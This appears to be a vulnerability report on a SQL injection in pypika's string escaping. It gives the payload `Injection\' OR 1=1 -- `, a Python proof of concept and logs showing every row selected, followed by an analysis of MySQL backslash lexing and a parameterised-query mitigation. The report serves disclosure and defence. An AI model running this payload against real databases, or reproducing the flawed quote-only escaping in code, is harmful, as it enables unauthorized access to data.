Found the possibility to make an injection.
If the user input looks like this:
Injection\\' OR 1=1 --
And you process it like this:
```python
from pypika import Field, Query, Table
from pypika.queries import QueryBuilder

TABLE_NAME: str = "my_table"
INJECTION: str = "Injection\\' OR 1=1 -- "
table: Table = Table(TABLE_NAME)
query: QueryBuilder = Query.from_(table).select(table.star).where(Field("val0") == INJECTION)
sql: str = query.get_sql(quote_char=None)
connection.execute(sql)  # `connection` is an already-open DB-API connection
```
All the table rows would be selected.
My test logs:
```
[2025-07-24, 15:06:30 UTC] {sql.py:814} INFO - Running statement: SELECT * FROM my_table WHERE val0='Injection\'' OR 1=1 -- ', parameters: None
[2025-07-24, 15:06:30 UTC] {sql.py:823} INFO - Rows affected: 4
...
```
The last message means 4 rows were selected (all that I have there).
P.S. A quote char (and the default double-quote) would not save you:
```
[2025-07-24, 15:24:09 UTC] {sql.py:814} INFO - Running statement: SELECT * FROM `my_table` WHERE `val0`='Injection\'' OR 1=1 -- ', parameters: None
[2025-07-24, 15:24:09 UTC] {sql.py:823} INFO - Rows affected: 4
...
```
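Why the statement in the logs above ends up with an open `OR 1=1`, as an added example that is not part of this issue or of pypika: `mysql_lex` reads a statement the way a MySQL server with backslash escapes enabled does, `quote_doubling_only` is an assumed model of the escaping visible in the log (only the quote is doubled), and `where_clause_intact` is a defensive check that the value comes back as exactly one literal. `PREFIX` and the function names are this example's own.

```python
USER_INPUT = "Injection\\' OR 1=1 -- "   # constructed copy of the input from the issue
PREFIX = "SELECT * FROM my_table WHERE val0="

def mysql_lex(sql: str) -> tuple[list[str], str]:
    """Read `sql` the way MySQL's lexer does with backslash escapes enabled:
    returns the decoded single-quoted literals and the text outside them
    (a `-- ` comment ends the statement)."""
    literals, outside, i, n = [], [], 0, len(sql)
    while i < n:
        if sql.startswith("--", i) and (i + 2 == n or sql[i + 2] in " \t"):
            break                                   # rest is a comment
        if sql[i] != "'":
            outside.append(sql[i]); i += 1
            continue
        i, buf = i + 1, []
        while i < n:
            if sql[i] == "\\" and i + 1 < n:       # \x decodes to x
                buf.append(sql[i + 1]); i += 2
            elif sql.startswith("''", i):          # '' decodes to '
                buf.append("'"); i += 2
            elif sql[i] == "'":                    # closing quote
                i += 1; break
            else:
                buf.append(sql[i]); i += 1
        literals.append("".join(buf))
    return literals, "".join(outside)

def quote_doubling_only(value: str) -> str:
    """Assumed model of the escaping seen in the issue log: only ' is doubled."""
    return "'" + value.replace("'", "''") + "'"

def quote_backslash_aware(value: str) -> str:
    """Escaping that agrees with the lexer above: backslash first, then quote."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def where_clause_intact(value: str, quote) -> bool:
    """Defensive check: the server must read back exactly one literal equal
    to `value`, with nothing but the intended prefix outside it."""
    literals, outside = mysql_lex(PREFIX + quote(value))
    return literals == [value] and outside == PREFIX

if __name__ == "__main__":
    print(mysql_lex(PREFIX + quote_doubling_only(USER_INPUT)))
    print(where_clause_intact(USER_INPUT, quote_doubling_only))    # False
    print(where_clause_intact(USER_INPUT, quote_backslash_aware))  # True
```

Backslash-aware escaping only holds while the server keeps backslash escapes enabled (it breaks under `NO_BACKSLASH_ESCAPES`), so the robust mitigation is to send user values as driver parameters rather than inlining them into the SQL text, which the `parameters: None` in the log shows is not happening here.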